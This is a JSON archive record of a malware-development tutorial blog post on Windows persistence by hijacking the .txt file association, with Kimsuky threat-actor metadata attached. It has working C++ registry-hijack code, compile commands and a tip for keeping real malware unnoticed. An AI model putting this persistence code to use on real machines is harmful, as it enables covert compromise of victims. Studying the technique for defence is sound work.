{
	"id": "cc794391-4dca-409f-be29-344c88908dd7",
	"created_at": "2026-04-06T02:12:11.338986Z",
	"updated_at": "2026-04-10T03:37:41.026762Z",
	"deleted_at": null,
	"sha1_hash": "d024ba07693e90631f56e0ccf049775a082516ca",
	"title": "Malware development: persistence - part 9. Default file extension hijacking. Simple C++ example.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1100175,
	"plain_text": "Malware development: persistence - part 9. Default file extension hijacking. Simple C++ example.\r\nBy cocomelonc\r\nPublished: 2022-08-26 · Archived: 2026-04-06 01:29:22 UTC\r\n2 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis article is the result of my own research into one of the interesting malware persistence tricks: hijacking the default file extension.\r\ndefault file association\r\nFor example, when a .txt file is double-clicked, notepad.exe is used to open it.\r\nhttps://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html\r\nPage 1 of 9\r\nWindows knows that it must use notepad.exe to open .txt files because the .txt extension (and many others) is mapped in the registry, under HKEY_CLASSES_ROOT, to the application that can open such files.\r\nIt is possible to hijack a default file association to execute a malicious program.\r\npractical example\r\nLet’s hijack .txt. In this case, the .txt extension handler is specified in the registry key listed below:\r\nHKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\r\nRun the command:\r\nreg query \"HKCR\\txtfile\\shell\\open\\command\" /s\r\nThen, create our “malicious” application:\r\n/*\r\nhack.cpp\r\nevil app for windows persistence via\r\nhijacking default file extension\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#pragma comment (lib, \"user32.lib\")\r\n\r\n// the whole payload is a message box, so the hijack is easy to observe\r\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {\r\n  MessageBox(NULL, \"Meow-meow!\", \"=^..^=\", MB_OK);\r\n  return 0;\r\n}\r\nAs you can see, the logic is as simple as usual: just pop up a meow-meow message box.\r\nAt the next step, hijack the .txt file extension by modifying the value data of HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command with this program:\r\n/*\r\npers.cpp\r\nwindows persistence via\r\nhijacking default file extension\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstring.h\u003e\r\n#include \u003cstdlib.h\u003e\r\n#include \u003cstdio.h\u003e\r\n\r\nint main(int argc, char* argv[]) {\r\n  HKEY hkey = NULL;\r\n  // command to replace:\r\n  // \"%SystemRoot%\\\\system32\\\\NOTEPAD.EXE %1\"\r\n  // malicious app\r\n  const char* cmd = \"Z:\\\\2022-08-26-malware-pers-9\\\\hack.exe\";\r\n  // hijacking logic: open the .txt open-command key for writing\r\n  LONG res = RegOpenKeyEx(HKEY_CLASSES_ROOT, (LPCSTR)\"\\\\txtfile\\\\shell\\\\open\\\\command\", 0, KEY_WRITE, \u0026hkey);\r\n  if (res == ERROR_SUCCESS) {\r\n    // update the (Default) value; for REG_SZ the size must include the terminating null\r\n    RegSetValueEx(hkey, (LPCSTR)\"\", 0, REG_SZ, (const BYTE*)cmd, (DWORD)strlen(cmd) + 1);\r\n    RegCloseKey(hkey);\r\n  }\r\n  return 0;\r\n}\r\nAs you can see, in this source code we just replace %SystemRoot%\\system32\\NOTEPAD.EXE %1 with Z:\\2022-08-26-malware-pers-9\\hack.exe.\r\ndemo\r\nLet’s see everything in action. Compile our malware:\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nThe generated hack.exe needs to be dropped onto the victim’s machine.\r\nThen, compile the program responsible for persistence:\r\nx86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\nThe generated pers.exe also needs to be dropped onto the victim’s machine.\r\nThen just run:\r\n.\\pers.exe\r\nNow try to open a .txt file, for example by double-clicking test.txt:\r\nAs you can see, the “malware” is executed. Perfect! :)\r\nThen, cleanup:\r\nreg add \"HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\" /ve /t REG_SZ /d \"%SystemRoot%\\system32\\NOTEPAD.EXE %1\"\r\nIt would be good practice to do this (in real malware) with slightly different logic, so that the victim user is still able to open the original .txt file but additionally runs the malicious activity.\r\nThis persistence trick is used by the SILENTTRINITY framework and the Kimsuky cyber espionage group. This malware was used in a 2019 campaign against Croatian government agencies by unidentified cyber actors.\r\nI hope this post spreads awareness of this interesting technique to the blue teamers, and adds a weapon to the red teamers’ arsenal.\r\nMITRE ATT\u0026CK: Change Default File Association\r\nSILENTTRINITY\r\nKimsuky\r\nsource code on Github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time, happy hacking and good bye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html"
	],
	"report_names": [
		"malware-pers-9.html"
	],
	"threat_actors": [
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775441531,
	"ts_updated_at": 1775792261,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d024ba07693e90631f56e0ccf049775a082516ca.pdf",
		"text": "https://archive.orkl.eu/d024ba07693e90631f56e0ccf049775a082516ca.txt",
		"img": "https://archive.orkl.eu/d024ba07693e90631f56e0ccf049775a082516ca.jpg"
	}
}